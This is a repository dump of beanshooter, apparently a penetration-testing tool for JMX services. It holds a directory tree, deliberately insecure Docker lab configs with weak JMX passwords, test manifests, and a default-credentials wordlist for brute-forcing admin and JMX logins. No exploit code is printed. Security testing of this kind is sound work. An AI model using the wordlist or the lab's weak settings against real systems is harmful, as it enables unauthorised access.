├── docker ├── jolokia │ ├── resources │ │ ├── conf │ │ │ ├── jmxremote.access │ │ │ ├── jmxremote.password │ │ │ └── tomcat-users.xml │ │ └── scripts │ │ │ └── start.sh │ ├── README.md │ ├── docker-compose.yml │ └── Dockerfile ├── jmx-example-server │ ├── resources │ │ ├── conf │ │ │ ├── jmxmp.access │ │ │ ├── jmxremote.access │ │ │ └── jmxremote.password │ │ ├── trust │ │ │ ├── store.p12 │ │ │ ├── create.sh │ │ │ └── openssl.config │ │ ├── scripts │ │ │ └── start.sh │ │ └── server │ │ │ └── src │ │ │ └── de │ │ │ └── qtc │ │ │ └── beanshooter │ │ │ └── server │ │ │ ├── jmxmp │ │ │ ├── PlainJmxmpServer.java │ │ │ └── SslJmxmpServer.java │ │ │ └── rmi │ │ │ └── PlainJmxConnector.java │ ├── CHANGELOG.md │ ├── docker-compose.yml │ └── README.md ├── tomcat │ ├── resources │ │ ├── trust │ │ │ ├── store.p12 │ │ │ ├── create.sh │ │ │ └── openssl.config │ │ ├── scripts │ │ │ └── start.sh │ │ └── conf │ │ │ └── tomcat-users.xml │ ├── Dockerfile │ └── docker-compose.yml └── README.md ├── tests ├── jolokia │ ├── recorder │ │ └── tricot.yml │ ├── mlet │ │ ├── tricot.yml │ │ └── load │ │ │ └── error │ │ │ └── tricot.yml │ ├── diagnostic │ │ ├── tricot.yml │ │ ├── props │ │ │ └── tricot.yml │ │ └── cmdline │ │ │ └── tricot.yml │ ├── hotspot │ │ ├── tricot.yml │ │ ├── get │ │ │ ├── error │ │ │ │ └── tricot.yml │ │ │ └── tricot.yml │ │ ├── list │ │ │ └── tricot.yml │ │ ├── dump │ │ │ ├── tricot.yml │ │ │ └── error │ │ │ │ └── tricot.yml │ │ └── set │ │ │ ├── tricot.yml │ │ │ └── error │ │ │ └── tricot.yml │ ├── tomcat │ │ ├── tricot.yml │ │ ├── list │ │ │ ├── error │ │ │ │ └── tricot.yml │ │ │ └── tricot.yml │ │ ├── invoke │ │ │ └── tricot.yml │ │ ├── info │ │ │ └── tricot.yml │ │ ├── enum │ │ │ └── tricot.yml │ │ ├── write │ │ │ ├── error │ │ │ │ └── tricot.yml │ │ │ └── tricot.yml │ │ ├── attr │ │ │ └── tricot.yml │ │ └── dump │ │ │ ├── tricot.yml │ │ │ └── error │ │ │ └── tricot.yml │ ├── basic │ │ ├── tricot.yml │ │ ├── list │ │ │ └── tricot.yml │ │ ├── enum │ │ │ ├── error │ │ │ │ └── tricot.yml │ │ │ └── tricot.yml │ │ ├── deploy │ │ │ └── tricot.yml │ │ ├── info │ │ │ ├── error │ │ │ │ └── tricot.yml │ │ │ └── tricot.yml │ │ ├── serial │ │ │ └── tricot.yml │ │ └── attr │ │ │ └── error │ │ │ └── tricot.yml │ └── tricot.yml ├── serverless │ ├── stats │ │ ├── tricot.yml │ │ └── generic │ │ │ └── tricot.yml │ ├── export │ │ ├── tricot.yml │ │ └── error │ │ │ └── tricot.yml │ ├── stager │ │ └── tricot.yml │ └── tricot.yml ├── tomcat-server │ ├── recorder │ │ ├── tricot.yml │ │ └── all │ │ │ └── tricot.yml │ ├── mlet │ │ ├── tricot.yml │ │ ├── status │ │ │ └── tricot.yml │ │ └── load │ │ │ ├── tricot.yml │ │ │ └── error │ │ │ └── tricot.yml │ ├── hotspot │ │ ├── list │ │ │ ├── tricot.yml │ │ │ └── rmi │ │ │ │ └── tricot.yml │ │ ├── dump │ │ │ ├── tricot.yml │ │ │ ├── rmi │ │ │ │ └── tricot.yml │ │ │ └── error │ │ │ │ └── tricot.yml │ │ ├── get │ │ │ ├── tricot.yml │ │ │ ├── error │ │ │ │ └── tricot.yml │ │ │ └── rmi │ │ │ │ └── tricot.yml │ │ ├── set │ │ │ ├── tricot.yml │ │ │ ├── rmi │ │ │ │ └── tricot.yml │ │ │ └── error │ │ │ │ └── tricot.yml │ │ └── tricot.yml │ ├── diagnostic │ │ ├── load │ │ │ ├── tricot.yml │ │ │ ├── rmi │ │ │ │ └── tricot.yml │ │ │ └── error │ │ │ │ └── tricot.yml │ │ ├── nolog │ │ │ ├── tricot.yml │ │ │ └── rmi │ │ │ │ └── tricot.yml │ │ ├── props │ │ │ ├── tricot.yml │ │ │ └── rmi │ │ │ │ └── tricot.yml │ │ ├── cmdline │ │ │ ├── tricot.yml │ │ │ └── rmi │ │ │ │ └── tricot.yml │ │ ├── read │ │ │ ├── tricot.yml │ │ │ ├── rmi │ │ │ │ └── tricot.yml │ │ │ └── error │ │ │ │ └── tricot.yml │ │ ├── logfile │ │ │ ├── tricot.yml │ │ │ ├── error │ │ │ │ └── tricot.yml │ │ │ └── rmi │ │ │ │ └── tricot.yml │ │ └── tricot.yml │ ├── tomcat │ │ ├── info │ │ │ ├── tricot.yml │ │ │ └── rmi │ │ │ │ └── tricot.yml │ │ ├── attr │ │ │ ├── tricot.yml │ │ │ └── rmi │ │ │ │ └── tricot.yml │ │ ├── list │ │ │ ├── tricot.yml │ │ │ ├── rmi │ │ │ │ └── tricot.yml │ │ │ └── error │ │ │ │ └── tricot.yml │ │ ├── invoke │ │ │ ├── tricot.yml │ │ │ └── rmi │ │ │ │ └── tricot.yml │ │ ├── write │ │ │ ├── tricot.yml │ │ │ ├── error │ │ │ │ └── tricot.yml │ │ │ └── rmi │ │ │ │ └── tricot.yml │ │ ├── dump │ │ │ ├── tricot.yml │ │ │ ├── rmi │ │ │ │ └── tricot.yml │ │ │ └── error │ │ │ │ └── tricot.yml │ │ ├── enum │ │ │ ├── tricot.yml │ │ │ └── rmi │ │ │ │ └── tricot.yml │ │ └── tricot.yml │ └── tricot.yml ├── jmx-example-server-2 │ ├── mlet │ │ ├── tricot.yml │ │ ├── status │ │ │ ├── tricot.yml │ │ │ └── jmxmp │ │ │ │ └── tricot.yml │ │ └── load │ │ │ ├── tricot.yml │ │ │ ├── error │ │ │ └── tricot.yml │ │ │ └── jmxmp │ │ │ └── tricot.yml │ ├── tonka │ │ ├── deploy │ │ │ ├── tricot.yml │ │ │ └── rmi │ │ │ │ └── tricot.yml │ │ ├── version │ │ │ ├── rmi │ │ │ │ └── tricot.yml │ │ │ ├── jmxmp │ │ │ │ └── tricot.yml │ │ │ └── tricot.yml │ │ ├── undeploy │ │ │ ├── rmi │ │ │ │ └── tricot.yml │ │ │ └── tricot.yml │ │ ├── exec │ │ │ ├── jmxmp │ │ │ │ └── tricot.yml │ │ │ ├── tricot.yml │ │ │ └── error │ │ │ │ └── tricot.yml │ │ ├── status │ │ │ ├── tricot.yml │ │ │ └── jmxmp │ │ │ │ └── tricot.yml │ │ ├── execarray │ │ │ ├── tricot.yml │ │ │ ├── jmxmp │ │ │ │ └── tricot.yml │ │ │ └── rmi │ │ │ │ └── tricot.yml │ │ ├── upload │ │ │ ├── tricot.yml │ │ │ ├── jmxmp │ │ │ │ └── tricot.yml │ │ │ └── error │ │ │ │ └── tricot.yml │ │ ├── download │ │ │ ├── tricot.yml │ │ │ ├── jmxmp │ │ │ │ └── tricot.yml │ │ │ └── error │ │ │ │ └── tricot.yml │ │ └── tricot.yml │ └── tricot.yml ├── jmx-example-server │ ├── attr │ │ └── tricot.yml │ ├── info │ │ ├── tricot.yml │ │ ├── error │ │ │ └── tricot.yml │ │ └── rmi │ │ │ └── tricot.yml │ ├── list │ │ ├── tricot.yml │ │ ├── rmi │ │ │ └── tricot.yml │ │ └── jmxmp │ │ │ └── tricot.yml │ ├── enum │ │ └── tricot.yml │ ├── brute │ │ ├── tricot.yml │ │ └── error │ │ │ └── tricot.yml │ ├── deploy │ │ ├── tricot.yml │ │ └── error │ │ │ └── tricot.yml │ ├── invoke │ │ └── tricot.yml │ ├── serial │ │ ├── tricot.yml │ │ └── error │ │ │ └── tricot.yml │ └── tricot.yml └── tricot.yml ├── docs └── README.md ├── beanshooter ├── src │ └── de │ │ └── qtc │ │ └── beanshooter │ │ ├── cli │ │ ├── ArgType.java │ │ ├── Operation.java │ │ └── Option.java │ │ ├── exceptions │ │ ├── OpenTypeException.java │ │ ├── SaslMissingException.java │ │ ├── SaslProfileException.java │ │ ├── ApacheKarafException.java │ │ ├── WrongCredentialsException.java │ │ ├── SaslSuperflousException.java │ │ ├── UnknownSecurityException.java │ │ ├── LoginClassCastException.java │ │ ├── MissingCredentialsException.java │ │ ├── InvalidLoginClassException.java │ │ ├── MalformedPluginException.java │ │ ├── PluginException.java │ │ ├── MismatchedURIException.java │ │ └── GlassFishException.java │ │ ├── mbean │ │ ├── INative.java │ │ ├── mlet │ │ │ └── MLetMBean.java │ │ ├── IMBean.java │ │ ├── tomcat │ │ │ ├── UserMBean.java │ │ │ └── MemoryUserDatabaseMBean.java │ │ ├── hotspot │ │ │ └── HotSpotDiagnosticMXBean.java │ │ ├── diagnostic │ │ │ └── DiagnosticCommandMBean.java │ │ ├── flightrecorder │ │ │ └── FlightRecorderMXBean.java │ │ └── tonkabean │ │ │ └── TonkaBeanMBean.java │ │ ├── plugin │ │ ├── IResponseHandler.java │ │ ├── IPayloadProvider.java │ │ ├── IAuthenticationProvider.java │ │ ├── providers │ │ │ ├── YsoSerialProvider.java │ │ │ └── AuthenticationProvider.java │ │ ├── IMBeanServerProvider.java │ │ └── IArgumentProvider.java │ │ ├── Starter.java │ │ ├── networking │ │ ├── DummyTrustManager.java │ │ └── RMIEndpoint.java │ │ └── utils │ │ └── DeserializationCanary.java ├── default-credentials.txt └── config.properties ├── plugins ├── README.md └── build.sh ├── pom.xml ├── tonka-bean ├── src │ └── de │ │ └── qtc │ │ └── beanshooter │ │ └── tonkabean │ │ └── TonkaBeanMBean.java ├── README.md └── pom.xml ├── .github └── workflows │ ├── feat.yml │ ├── develop-example-server.yml │ ├── master-example-server.yml │ ├── master.yml │ └── develop.yml ├── .gitignore └── Dockerfile /docker/jolokia/resources/conf/jmxremote.access: -------------------------------------------------------------------------------- 1 | monitorRole readonly 2 | controlRole readwrite 3 | -------------------------------------------------------------------------------- /docker/jolokia/resources/conf/jmxremote.password: -------------------------------------------------------------------------------- 1 | monitorRole monitor 2 | controlRole control 3 | -------------------------------------------------------------------------------- /docker/jmx-example-server/resources/conf/jmxmp.access: -------------------------------------------------------------------------------- 1 | monitorRole readonly 2 | controlRole readwrite 3 | -------------------------------------------------------------------------------- /docker/jmx-example-server/resources/conf/jmxremote.access: -------------------------------------------------------------------------------- 1 | monitorRole readonly 2 | controlRole readwrite 3 | -------------------------------------------------------------------------------- /docker/jmx-example-server/resources/conf/jmxremote.password: -------------------------------------------------------------------------------- 1 | monitorRole monitor 2 | controlRole control 3 | -------------------------------------------------------------------------------- /docker/tomcat/resources/trust/store.p12: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qtc-de/beanshooter/HEAD/docker/tomcat/resources/trust/store.p12 -------------------------------------------------------------------------------- /docker/jmx-example-server/resources/trust/store.p12: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qtc-de/beanshooter/HEAD/docker/jmx-example-server/resources/trust/store.p12 -------------------------------------------------------------------------------- /tests/jolokia/recorder/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: recorder related tests 3 | description: |- 4 | Tests for beanshooters recorder action 5 | 6 | id: '14' 7 | groups: 8 | - recorder 9 | 10 | testers: 11 | - ./all/tricot.yml 12 | -------------------------------------------------------------------------------- /tests/serverless/stats/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: stats action 3 | description: |- 4 | Perform tests on beanshooters stats action 5 | 6 | id: '02-02' 7 | groups: 8 | - stats 9 | 10 | testers: 11 | - ./generic/tricot.yml 12 | -------------------------------------------------------------------------------- /tests/jolokia/mlet/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: mlet related tests 3 | description: |- 4 | Tests for the mlet action 5 | 6 | id: '12' 7 | groups: 8 | - mlet 9 | 10 | testers: 11 | - ./status/tricot.yml 12 | - ./load/tricot.yml 13 | -------------------------------------------------------------------------------- /tests/serverless/export/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: export action 3 | description: |- 4 | Perform tests on beanshooters export action 5 | 6 | id: '02-03' 7 | groups: 8 | - export 9 | 10 | testers: 11 | - ./generic/tricot.yml 12 | -------------------------------------------------------------------------------- /tests/tomcat-server/recorder/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: recorder related tests 3 | description: |- 4 | Tests for beanshooters recorder action 5 | 6 | id: '09' 7 | groups: 8 | - recorder 9 | 10 | testers: 11 | - ./all/tricot.yml 12 | -------------------------------------------------------------------------------- /tests/tomcat-server/mlet/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: mlet related tests 3 | description: |- 4 | Tests for the mlet action 5 | 6 | id: '07' 7 | groups: 8 | - mlet 9 | 10 | testers: 11 | - ./status/tricot.yml 12 | - ./load/tricot.yml 13 | -------------------------------------------------------------------------------- /tests/jmx-example-server-2/mlet/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: mlet related tests 3 | description: |- 4 | Tests for the mlet action 5 | 6 | id: '04' 7 | groups: 8 | - mlet 9 | 10 | testers: 11 | - ./status/tricot.yml 12 | - ./load/tricot.yml 13 | -------------------------------------------------------------------------------- /tests/tomcat-server/hotspot/list/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: hotspot list action 3 | description: |- 4 | Perform tests on beanshooters hotspot list action 5 | 6 | id: '08-02' 7 | groups: 8 | - list 9 | 10 | testers: 11 | - ./rmi/tricot.yml 12 | -------------------------------------------------------------------------------- /tests/serverless/stager/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: stager action 3 | description: |- 4 | Perform tests on beanshooters stager action 5 | 6 | id: '02-01' 7 | groups: 8 | - stager 9 | 10 | testers: 11 | - ./generic/tricot.yml 12 | - ./error/tricot.yml 13 | -------------------------------------------------------------------------------- /tests/tomcat-server/diagnostic/load/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: diagnostic load action 3 | description: |- 4 | Perform tests on beanshooters diagnostic load action 5 | 6 | id: '06-02' 7 | groups: 8 | - load 9 | 10 | testers: 11 | - ./error/tricot.yml 12 | -------------------------------------------------------------------------------- /tests/tomcat-server/diagnostic/nolog/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: diagnostic nolog action 3 | description: |- 4 | Perform tests on beanshooters diagnostic nolog action 5 | 6 | id: '06-04' 7 | groups: 8 | - nolog 9 | 10 | testers: 11 | - ./rmi/tricot.yml 12 | -------------------------------------------------------------------------------- /tests/tomcat-server/diagnostic/props/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: diagnostic props action 3 | description: |- 4 | Perform tests on beanshooters diagnostic props action 5 | 6 | id: '06-06' 7 | groups: 8 | - props 9 | 10 | testers: 11 | - ./rmi/tricot.yml 12 | -------------------------------------------------------------------------------- /tests/jolokia/diagnostic/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: diagnostic related tests 3 | description: |- 4 | Tests for the diagnostic action 5 | 6 | id: '11' 7 | groups: 8 | - diagnostic 9 | 10 | testers: 11 | - ./cmdline/tricot.yml 12 | - ./props/tricot.yml 13 | -------------------------------------------------------------------------------- /tests/tomcat-server/diagnostic/cmdline/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: diagnostic cmdline action 3 | description: |- 4 | Perform tests on beanshooters diagnostic cmdline action 5 | 6 | id: '06-05' 7 | groups: 8 | - cmdline 9 | 10 | testers: 11 | - ./rmi/tricot.yml 12 | -------------------------------------------------------------------------------- /tests/tomcat-server/tomcat/info/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tomcat info action 3 | description: |- 4 | Perform the info action within the submenu of the tomcat 5 | action. 6 | 7 | id: '05-04' 8 | groups: 9 | - info 10 | 11 | testers: 12 | - ./rmi/tricot.yml 13 | -------------------------------------------------------------------------------- /docker/tomcat/resources/trust/create.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | set -e 4 | 5 | openssl req -x509 -nodes -keyout key.pem -out cert.pem -new -config openssl.config -days 999999 6 | openssl pkcs12 -export -out store.p12 -inkey key.pem -in cert.pem -password pass:password 7 | 8 | rm key.pem cert.pem 9 | -------------------------------------------------------------------------------- /tests/jmx-example-server/attr/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: attr action 3 | description: |- 4 | Perform tests on beanshooters attr action 5 | 6 | id: '01-07' 7 | groups: 8 | - attr 9 | - target 10 | 11 | testers: 12 | - ./rmi/tricot.yml 13 | - ./error/tricot.yml 14 | -------------------------------------------------------------------------------- /tests/jmx-example-server/info/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: info action 3 | description: |- 4 | Perform tests on beanshooters info action 5 | 6 | id: '01-08' 7 | groups: 8 | - info 9 | - target 10 | 11 | testers: 12 | - ./rmi/tricot.yml 13 | - ./error/tricot.yml 14 | -------------------------------------------------------------------------------- /tests/jmx-example-server/list/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: list action 3 | description: |- 4 | Perform tests on beanshooters list action 5 | 6 | id: '01-05' 7 | groups: 8 | - list 9 | - target 10 | 11 | testers: 12 | - ./rmi/tricot.yml 13 | - ./jmxmp/tricot.yml 14 | -------------------------------------------------------------------------------- /tests/tomcat-server/hotspot/dump/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: hotspot dump action 3 | description: |- 4 | Perform tests on beanshooters hotspot dump action 5 | 6 | id: '08-01' 7 | groups: 8 | - dump 9 | 10 | testers: 11 | - ./error/tricot.yml 12 | - ./rmi/tricot.yml 13 | -------------------------------------------------------------------------------- /tests/tomcat-server/hotspot/get/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: hotspot get action 3 | description: |- 4 | Perform tests on beanshooters hotspot get action 5 | 6 | id: '08-03' 7 | groups: 8 | - get 9 | 10 | testers: 11 | - ./rmi/tricot.yml 12 | - ./error/tricot.yml 13 | -------------------------------------------------------------------------------- /tests/tomcat-server/hotspot/set/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: hotspot set action 3 | description: |- 4 | Perform tests on beanshooters hotspot set action 5 | 6 | id: '08-04' 7 | groups: 8 | - set 9 | 10 | testers: 11 | - ./rmi/tricot.yml 12 | - ./error/tricot.yml 13 | -------------------------------------------------------------------------------- /tests/tomcat-server/tomcat/attr/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tomcat attr action 3 | description: |- 4 | Perform the attr action within the submenu of the tomcat 5 | operation. 6 | 7 | id: '05-01' 8 | groups: 9 | - attr 10 | 11 | testers: 12 | - ./rmi/tricot.yml 13 | -------------------------------------------------------------------------------- /tests/tomcat-server/tomcat/list/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tomcat list action 3 | description: |- 4 | Perform tests on beanshooters tomcat list action 5 | 6 | id: '05-06' 7 | groups: 8 | - list 9 | 10 | testers: 11 | - ./rmi/tricot.yml 12 | - ./error/tricot.yml 13 | -------------------------------------------------------------------------------- /tests/tomcat-server/tomcat/invoke/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tomcat invoke action 3 | description: |- 4 | Perform the invoke action within the submenu of the tomcat 5 | operation. 6 | 7 | id: '05-05' 8 | groups: 9 | - invoke 10 | 11 | testers: 12 | - ./rmi/tricot.yml 13 | -------------------------------------------------------------------------------- /tests/tomcat-server/tomcat/write/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tomcat write action 3 | description: |- 4 | Perform tests on beanshooters tomcat write action 5 | 6 | id: '05-07' 7 | groups: 8 | - write 9 | 10 | testers: 11 | - ./rmi/tricot.yml 12 | - ./error/tricot.yml 13 | -------------------------------------------------------------------------------- /docker/jmx-example-server/resources/trust/create.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | set -e 4 | 5 | openssl req -x509 -nodes -keyout key.pem -out cert.pem -new -config openssl.config -days 999999 6 | openssl pkcs12 -export -out store.p12 -inkey key.pem -in cert.pem -password pass:password 7 | 8 | rm key.pem cert.pem 9 | -------------------------------------------------------------------------------- /tests/tomcat-server/diagnostic/read/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: diagnostic read action 3 | description: |- 4 | Perform tests on beanshooters diagnostic read action 5 | 6 | id: '06-01' 7 | groups: 8 | - read 9 | 10 | testers: 11 | - ./rmi/tricot.yml 12 | - ./error/tricot.yml 13 | -------------------------------------------------------------------------------- /tests/tomcat-server/tomcat/dump/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tomcat dump action 3 | description: |- 4 | Perform some tests on the dump action of beanshooters tomcat operation 5 | 6 | id: '05-02' 7 | groups: 8 | - dump 9 | 10 | testers: 11 | - ./rmi/tricot.yml 12 | - ./error/tricot.yml 13 | -------------------------------------------------------------------------------- /tests/tomcat-server/diagnostic/logfile/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: diagnostic logfile action 3 | description: |- 4 | Perform tests on beanshooters diagnostic logfile action 5 | 6 | id: '06-03' 7 | groups: 8 | - logfile 9 | 10 | testers: 11 | - ./rmi/tricot.yml 12 | - ./error/tricot.yml 13 | -------------------------------------------------------------------------------- /tests/tomcat-server/tomcat/enum/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tomcat enum action 3 | description: |- 4 | Performs beanshooters regular enum action, but on a server 5 | with tomcat related MBeans available 6 | 7 | id: '05-03' 8 | groups: 9 | - enum 10 | 11 | testers: 12 | - ./rmi/tricot.yml 13 | -------------------------------------------------------------------------------- /tests/jmx-example-server/enum/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: enum action 3 | description: |- 4 | Perform tests on beanshooters enum action 5 | 6 | id: '01-04' 7 | groups: 8 | - enum 9 | - target 10 | 11 | testers: 12 | - ./rmi/tricot.yml 13 | - ./jmxmp/tricot.yml 14 | - ./error/tricot.yml 15 | -------------------------------------------------------------------------------- /tests/serverless/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: Serverless tests 3 | description: |- 4 | Tests that do not require a target server to be present 5 | 6 | id: '02' 7 | groups: 8 | - serverless 9 | 10 | 11 | testers: 12 | - ./stager/tricot.yml 13 | - ./stats/tricot.yml 14 | - ./export/tricot.yml 15 | -------------------------------------------------------------------------------- /tests/jmx-example-server/brute/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: brute action 3 | description: |- 4 | Perform tests on beanshooters brute action 5 | 6 | id: '01-01' 7 | groups: 8 | - brute 9 | - target 10 | 11 | testers: 12 | - ./rmi/tricot.yml 13 | - ./jmxmp/tricot.yml 14 | - ./error/tricot.yml 15 | -------------------------------------------------------------------------------- /tests/jmx-example-server/deploy/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: deploy action 3 | description: |- 4 | Perform tests on beanshooters deploy action 5 | 6 | id: '01-03' 7 | groups: 8 | - deploy 9 | - target 10 | 11 | testers: 12 | - ./rmi/tricot.yml 13 | - ./jmxmp/tricot.yml 14 | - ./error/tricot.yml 15 | -------------------------------------------------------------------------------- /tests/jmx-example-server/invoke/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: invoke action 3 | description: |- 4 | Perform tests on beanshooters invoke action 5 | 6 | id: '01-02' 7 | groups: 8 | - invoke 9 | - target 10 | 11 | testers: 12 | - ./rmi/tricot.yml 13 | - ./jmxmp/tricot.yml 14 | - ./error/tricot.yml 15 | -------------------------------------------------------------------------------- /tests/jmx-example-server/serial/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: serial action 3 | description: |- 4 | Perform tests on beanshooters serial action 5 | 6 | id: '01-06' 7 | groups: 8 | - serial 9 | - target 10 | 11 | testers: 12 | - ./rmi/tricot.yml 13 | - ./jmxmp/tricot.yml 14 | - ./error/tricot.yml 15 | -------------------------------------------------------------------------------- /tests/jolokia/hotspot/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: hotspot related tests 3 | description: |- 4 | Tests for beanshooters hotspot action 5 | 6 | id: '13' 7 | groups: 8 | - hotspot 9 | 10 | testers: 11 | - ./dump/tricot.yml 12 | - ./list/tricot.yml 13 | - ./get/tricot.yml 14 | - ./set/tricot.yml 15 | -------------------------------------------------------------------------------- /tests/jmx-example-server-2/tonka/deploy/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tonka deploy action 3 | description: |- 4 | Perform tests on beanshooters tonka deploy action 5 | 6 | id: '03-01' 7 | groups: 8 | - deploy 9 | 10 | testers: 11 | - ./error/tricot.yml 12 | - ./rmi/tricot.yml 13 | - ./jmxmp/tricot.yml 14 | -------------------------------------------------------------------------------- /tests/tomcat-server/hotspot/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: hotspot related tests 3 | description: |- 4 | Tests for beanshooters hotspot action 5 | 6 | id: '08' 7 | groups: 8 | - hotspot 9 | 10 | testers: 11 | - ./dump/tricot.yml 12 | - ./list/tricot.yml 13 | - ./get/tricot.yml 14 | - ./set/tricot.yml 15 | -------------------------------------------------------------------------------- /docs/README.md: -------------------------------------------------------------------------------- 1 | ### Documentation 2 | 3 | ---- 4 | 5 | The main documentation of *beanshooter* can be found in the [README.md](/) within the root folder. 6 | This folder contains some additional documentation on selected topics. Currently, the following pages 7 | are available: 8 | 9 | * [Jolokia](./jolokia.md) - Some notes about *beanshooters* *Jolokia* support. 10 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/cli/ArgType.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.cli; 2 | 3 | /** 4 | * The ArgType enum contains the possible argument types that may be passed on the 5 | * command line by the invoking user. 6 | * 7 | * @author Tobias Neitzel (@qtc_de) 8 | */ 9 | public enum ArgType 10 | { 11 | INT, 12 | BOOL, 13 | STRING, 14 | ARRAY; 15 | } 16 | -------------------------------------------------------------------------------- /tests/jolokia/tomcat/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tomcat related tests 3 | description: |- 4 | Tests for the tomcat action 5 | 6 | id: '10' 7 | groups: 8 | - tomcat 9 | 10 | testers: 11 | - ./attr/tricot.yml 12 | - ./dump/tricot.yml 13 | - ./enum/tricot.yml 14 | - ./info/tricot.yml 15 | - ./invoke/tricot.yml 16 | - ./list/tricot.yml 17 | - ./write/tricot.yml 18 | -------------------------------------------------------------------------------- /tests/tomcat-server/diagnostic/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: diagnostic related tests 3 | description: |- 4 | Tests for the diagnostic action 5 | 6 | id: '06' 7 | groups: 8 | - diagnostic 9 | 10 | testers: 11 | - ./read/tricot.yml 12 | - ./load/tricot.yml 13 | - ./logfile/tricot.yml 14 | - ./nolog/tricot.yml 15 | - ./cmdline/tricot.yml 16 | - ./props/tricot.yml 17 | -------------------------------------------------------------------------------- /beanshooter/default-credentials.txt: -------------------------------------------------------------------------------- 1 | admin:admin 2 | admin:password 3 | jmx:jmx 4 | jmx:admin 5 | karaf:karaf 6 | karaf:admin 7 | manager:manager 8 | manager:admin 9 | control:control 10 | control:password 11 | monitor:monitor 12 | monitor:password 13 | controlRole:control 14 | controlRole:password 15 | monitorRole:monitor 16 | monitorRole:password 17 | managerRole:manager 18 | managerRole:admin 19 | -------------------------------------------------------------------------------- /tests/tomcat-server/tomcat/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tomcat related tests 3 | description: |- 4 | Tests for the tomcat action 5 | 6 | id: '05' 7 | groups: 8 | - tomcat 9 | 10 | testers: 11 | - ./attr/tricot.yml 12 | - ./dump/tricot.yml 13 | - ./enum/tricot.yml 14 | - ./info/tricot.yml 15 | - ./invoke/tricot.yml 16 | - ./list/tricot.yml 17 | - ./write/tricot.yml 18 | -------------------------------------------------------------------------------- /docker/jolokia/resources/scripts/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | IP=$(cat /etc/hosts | tail -n 1 | cut -f1 -d" ") 4 | echo "[+] IP address of the container: ${IP}" 5 | 6 | echo "[+] Adding gateway address to /etc/hosts file..." 7 | GATEWAY="$(echo ${IP} | cut -f4 -d. --complement).1" 8 | echo "${GATEWAY} prevent.reverse.dns" >> /etc/hosts 9 | 10 | echo "[+] Starting tomcat..." 11 | exec catalina.sh run 12 | -------------------------------------------------------------------------------- /docker/jmx-example-server/CHANGELOG.md: -------------------------------------------------------------------------------- 1 | # Changelog 2 | 3 | All notable changes to this project will be documented in this file. 4 | 5 | The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/), 6 | and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). 7 | 8 | 9 | ## [2.1] - Mar 20, 2023 10 | 11 | ### Added 12 | 13 | * Add `java.xml` module 14 | * Add `CHANGELOG.md` 15 | -------------------------------------------------------------------------------- /docker/tomcat/resources/trust/openssl.config: -------------------------------------------------------------------------------- 1 | [req] 2 | default_bits = 4096 3 | prompt = no 4 | distinguished_name = dn 5 | 6 | [dn] 7 | C = XY 8 | ST = Here 9 | L = There 10 | O = Insecure Example Corp 11 | OU = Java Devops 12 | CN = iinsecure.example 13 | emailAddress = ivan.insecure@insecure.example 14 | -------------------------------------------------------------------------------- /docker/jmx-example-server/resources/trust/openssl.config: -------------------------------------------------------------------------------- 1 | [req] 2 | default_bits = 4096 3 | prompt = no 4 | distinguished_name = dn 5 | 6 | [dn] 7 | C = XY 8 | ST = Here 9 | L = There 10 | O = Insecure Example Corp 11 | OU = Java Devops 12 | CN = iinsecure.example 13 | emailAddress = ivan.insecure@insecure.example 14 | -------------------------------------------------------------------------------- /plugins/README.md: -------------------------------------------------------------------------------- 1 | ### Plugins 2 | 3 | ---- 4 | 5 